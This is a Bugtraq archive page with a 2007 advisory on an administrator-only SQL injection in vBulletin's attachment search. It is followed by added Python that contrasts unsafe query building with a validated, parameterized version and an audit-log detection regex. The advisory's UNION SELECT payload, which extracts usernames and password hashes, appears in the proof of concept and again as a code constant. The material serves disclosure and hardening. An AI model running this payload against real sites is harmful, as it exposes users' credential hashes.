Bugtraq mailing list archives
vbulletin admincp sql injection
From: disfigure <disfigure () gmail com>
Date: Tue, 13 Mar 2007 12:41:59 -0500
/****************************************/

CREDIT: discovered by meto5757 and disfigure

PRODUCT: vBulletin
http://www.vbulletin.com/

VULNERABILITY: SQL Injection

NOTES:
- not a serious vulnerability, can only be used by administrator of site
- SQL injection can be used to obtain password hash
- tested on 3.6.4 and 3.6.5

POC:
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:
   ') union select 1,1,1,1,1,userid,password,1,username from user -- 9

greets: w4ck1ng.com

/****************************************/
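The root cause the advisory describes is a date field whose contents reach the query as raw SQL text. The following is an added example, written for this archive page and not code from disfigure or from vBulletin: it contrasts the unsafe concatenation pattern with a hardened version that allow-list validates the "Attached Before" value as a YYYY-MM-DD date and binds it as a query parameter, plus a small check an admin-panel audit log could apply to flag the kind of input shown in the POC. The `attachment` table, its columns and the SQLite stand-in database are all constructed assumptions, not vBulletin's schema.

```python
import re
import sqlite3
from datetime import datetime, timezone

# Constructed sample: the exact string from the advisory's POC, as it would
# arrive in the "Attached Before" field.
POC_INPUT = "') union select 1,1,1,1,1,userid,password,1,username from user -- 9"

# Hypothetical table; vBulletin's real schema is not assumed here.
SCHEMA = """
CREATE TABLE attachment (attachmentid INTEGER PRIMARY KEY,
                         filename TEXT, dateline INTEGER);
"""
SAMPLE_ROWS = [  # constructed rows: one before, one after 2007-03-13 UTC
    (1, "before.png", 1173000000),
    (2, "after.png", 1174000000),
]


def make_sample_db():
    """Build an in-memory stand-in database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO attachment VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_search_sql_unsafe(attached_before):
    """The vulnerable pattern (hypothetical reconstruction, returned as text only):
    the field is spliced into the SQL string, so a quote in the input closes the
    literal and the rest of the input becomes part of the statement."""
    return ("SELECT attachmentid, filename FROM attachment "
            "WHERE dateline < strftime('%s', '" + attached_before + "')")


DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def parse_attached_before(value):
    """Allow-list validation: accept only YYYY-MM-DD and return a UTC epoch
    integer; anything else (including the POC string) raises ValueError."""
    if not DATE_RE.match(value):
        raise ValueError("attached_before must be YYYY-MM-DD")
    dt = datetime.strptime(value, "%Y-%m-%d").replace(tzinfo=timezone.utc)
    return int(dt.timestamp())


def search_attachments_safe(conn, attached_before):
    """Hardened path: validated integer bound as a parameter, never as SQL text."""
    cutoff = parse_attached_before(attached_before)
    return conn.execute(
        "SELECT attachmentid, filename FROM attachment WHERE dateline < ?",
        (cutoff,),
    ).fetchall()


SUSPICIOUS_RE = re.compile(r"(?i)'|--|\bunion\b\s+\bselect\b")


def looks_like_sqli(field_value):
    """Detection aid for an admin-panel audit log: a date field should never
    contain quotes, SQL comments or UNION SELECT, so flag it for review."""
    return SUSPICIOUS_RE.search(field_value) is not None


if __name__ == "__main__":
    db = make_sample_db()
    print("unsafe SQL text:", build_search_sql_unsafe(POC_INPUT))
    print("safe result:", search_attachments_safe(db, "2007-03-13"))
    print("POC flagged:", looks_like_sqli(POC_INPUT))
```

The hardened path rejects the POC string before any SQL is built, and even a value that passed validation only ever reaches the database as a bound integer. Because this is an administrator-only field, the audit-log check is mainly useful for spotting a compromised or abused admin account after the fact.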